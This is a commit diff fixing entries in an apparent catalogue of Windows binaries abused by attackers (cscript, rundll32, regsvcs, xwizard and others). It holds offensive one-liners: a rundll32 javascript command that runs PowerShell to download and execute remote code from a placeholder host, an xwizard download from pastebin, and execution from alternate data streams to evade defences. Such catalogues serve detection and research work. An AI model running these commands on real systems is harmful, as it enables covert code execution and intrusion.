Fixing various issues identified

2025-07-26 20:22:24 +02:00 · 2021-12-14 16:50:22 +00:00
parent adf171d089
commit 6793a7d238
17 changed files with 30 additions and 32 deletions
--- a/yml/OSBinaries/Cscript.yml
+++ b/yml/OSBinaries/Cscript.yml
@@ -4,7 +4,7 @@ Description: Binary used to execute scripts in Windows
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
-  - Command: cscript c:\ads\file.txt:script.vbs
+  - Command: cscript //e:vbscript c:\ads\file.txt:script.vbs
    Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
    Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
    Category: ADS
--- a/yml/OSBinaries/Hh.yml
+++ b/yml/OSBinaries/Hh.yml
@@ -19,8 +19,7 @@ Commands:
    MitreID: T1218.001
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Full_Path:
-  - Path: C:\Windows\System32\hh.exe
-  - Path: C:\Windows\SysWOW64\hh.exe
+  - Path: C:\Windows\hh.exe
 Code_Sample:
  - Code:
 Detection:
--- a/yml/OSBinaries/Infdefaultinstall.yml
+++ b/yml/OSBinaries/Infdefaultinstall.yml
@@ -8,7 +8,7 @@ Commands:
    Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
    Usecase: Code execution
    Category: Execute
-    Privileges: User
+    Privileges: Admin
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Full_Path:
--- a/yml/OSBinaries/Netsh.yml
+++ b/yml/OSBinaries/Netsh.yml
@@ -8,7 +8,7 @@ Commands:
    Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called
    Usecase: Proxy execution of .dll
    Category: Execute
-    Privileges: User
+    Privileges: Admin
    MitreID: T1546.007
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Full_Path:
--- a/yml/OSBinaries/Odbcconf.yml
+++ b/yml/OSBinaries/Odbcconf.yml
@@ -5,7 +5,7 @@ Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
  - Command: odbcconf -f file.rsp
-    Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file.
+    Description: Load DLL specified in target .RSP file. See the payloads folder for an example .RSP file.
    Usecase: Execute dll file using technique that can evade defensive counter measures
    Category: Execute
    Privileges: User
--- a/yml/OSBinaries/Regedit.yml
+++ b/yml/OSBinaries/Regedit.yml
@@ -19,8 +19,7 @@ Commands:
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Full_Path:
-  - Path: C:\Windows\System32\regedit.exe
-  - Path: C:\Windows\SysWOW64\regedit.exe
+  - Path: C:\Windows\regedit.exe
 Code_Sample:
  - Code:
 Detection:
--- a/yml/OSBinaries/Regsvcs.yml
+++ b/yml/OSBinaries/Regsvcs.yml
@@ -8,19 +8,19 @@ Commands:
    Description: Loads the target .DLL file and executes the RegisterClass function.
    Usecase: Execute dll file and bypass Application whitelisting
    Category: Execute
-    Privileges: Local Admin
+    Privileges: User
    MitreID: T1218.009
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - Command: regsvcs.exe AllTheThingsx64.dll
    Description: Loads the target .DLL file and executes the RegisterClass function.
    Usecase: Execute dll file and bypass Application whitelisting
    Category: AWL bypass
-    Privileges: Local Admin
+    Privileges: User
    MitreID: T1218.009
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Full_Path:
-  - Path: C:\Windows\System32\regsvcs.exe
-  - Path: C:\Windows\SysWOW64\regsvcs.exe
+  - Path: c:\Windows\Microsoft.NET\Framework\v*\regsvcs.exe
+  - Path: c:\Windows\Microsoft.NET\Framework64\v*\regsvcs.exe
 Code_Sample:
  - Code:
 Detection:
--- a/yml/OSBinaries/Rundll32.yml
+++ b/yml/OSBinaries/Rundll32.yml
@@ -18,7 +18,7 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
+  - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")
    Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
    Usecase: Execute code from Internet
    Category: Execute
--- a/yml/OSBinaries/Vbc.yml
+++ b/yml/OSBinaries/Vbc.yml
@@ -5,19 +5,19 @@ Author: Lior Adar
 Created: 2020-02-27
 Commands:
  - Command: vbc.exe /target:exe c:\temp\vbs\run.vb
-    Description: Binary file used by .NET to compile vb code to .exe
+    Description: Binary file used by .NET to compile Visual Basic code to an executable.
    Usecase: Compile attacker code on system. Bypass defensive counter measures.
    Category: Compile
    Privileges: User
    MitreID: T1127
-    OperatingSystem: Windows 10,7
+    OperatingSystem: Windows 7, Windows 10, Windows 11
  - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb
-    Description: Description of the second command
-    Usecase: A description of the usecase
+    Description: Binary file used by .NET to compile Visual Basic code to an executable.
+    Usecase: Compile attacker code on system. Bypass defensive counter measures.
    Category: Compile
    Privileges: User
    MitreID: T1127
-    OperatingSystem: Windows 10,7
+    OperatingSystem: Windows 7, Windows 10, Windows 11
 Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe
--- a/yml/OSBinaries/Wscript.yml
+++ b/yml/OSBinaries/Wscript.yml
@@ -4,7 +4,7 @@ Description: Used by Windows to execute scripts
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
-  - Command: wscript c:\ads\file.txt:script.vbs
+  - Command: wscript //e:vbscript c:\ads\file.txt:script.vbs
    Description: Execute script stored in an alternate data stream
    Usecase: Execute hidden code to evade defensive counter measures
    Category: ADS
--- a/yml/OSBinaries/Xwizard.yml
+++ b/yml/OSBinaries/Xwizard.yml
@@ -19,7 +19,7 @@ Commands:
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
-    Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file.
+    Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>
    Usecase: Download file from Internet
    Category: Download
    Privileges: User